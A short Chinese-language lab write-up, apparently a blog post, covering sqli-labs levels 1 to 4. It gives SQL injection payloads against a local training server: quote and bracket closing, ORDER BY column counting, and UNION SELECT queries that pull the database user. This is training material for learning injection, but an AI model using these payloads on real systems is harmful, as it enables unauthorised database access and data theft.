9、sqli-labs(报错注入1-4)

简介: 9、sqli-labs(报错注入1-4)

less 1


1、http://192.168.1.119/sqli/Less-1/?id=1

2、在id后面输入’,网页报错,

3、报错内容’1’’ LIMIT 0,1

4、猜测该sql语句为select * from ad where id=‘id’ limit 0,1

5、我们试着闭合

http://192.168.1.119/sqli/Less-1/?id=1’ --+

程序正常

6、通过order by判断字段数

http://192.168.1.119/sqli/Less-1/?id=1’ order by 3 --+

7、利用union select联合查询,获取表名

1’ union select 1,2,3 --+

http://192.168.1.119/sqli/Less-1/?id=19’ union select 1,user(),3 --+ 获取用户信息

less 2


1、http://192.168.1.119/sqli/Less-1/?id=1

2、输入and 1=1或 and 1=2,发现存在注入漏洞

3、通过order by还有union select得到用户信息

http://192.168.1.119/sqli/Less-2/?id=0 UNION SELECT 1,user(),3

less 3


1、通过报错可以用“’)”进行闭合

http://192.168.1.119/sqli/Less-3/?id=1’) --+

2、后面参照第一课

less 4


1、通过报错可以用“")”进行闭合

http://192.168.1.119/sqli/Less-4/?id=1") --+

2、后面参照第一课

禁止非法,后果自负

目录
相关文章
|
5月前
|
SQL 数据库
【SQL注入】 sqli-labs靶场 sqlmap注入
SQL注入 sqli-labs靶场 sqlmap注入
72 0
SQLi-LABS的Less21-30分析_less-21 coolie注入
SQLi-LABS的Less21-30分析_less-21 coolie注入
|
5月前
|
数据安全/隐私保护
【less-3】sqli-labs靶场第三关
【less-3】sqli-labs靶场第三关
|
6月前
|
安全 数据库 数据安全/隐私保护
sqli-labs第一关
sqli-labs第一关
|
6月前
|
SQL 数据库
10、sqli-labs(盲注8-10)
10、sqli-labs(盲注8-10)
35 1
|
6月前
|
PHP
8、sqli-labs环境
8、sqli-labs环境
40 1
|
SQL 安全
9、sqli-labs(报错注入1-4)
9、sqli-labs(报错注入1-4)
56 0
|
数据库 数据安全/隐私保护
SQLi LABS Less-19
第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下
178 0
SQLi LABS Less-19
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-22
2关使用POST请求提交参数,对账号和密码中的特殊字符执行了转译的操作,难度较大
108 0
SQLi LABS Less-22
|
SQL 数据库
SQLi LABS Less-27a
第27关使用GET请求提交参数,在url地址栏中构造payload即可 后端源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则
180 0
SQLi LABS Less-27a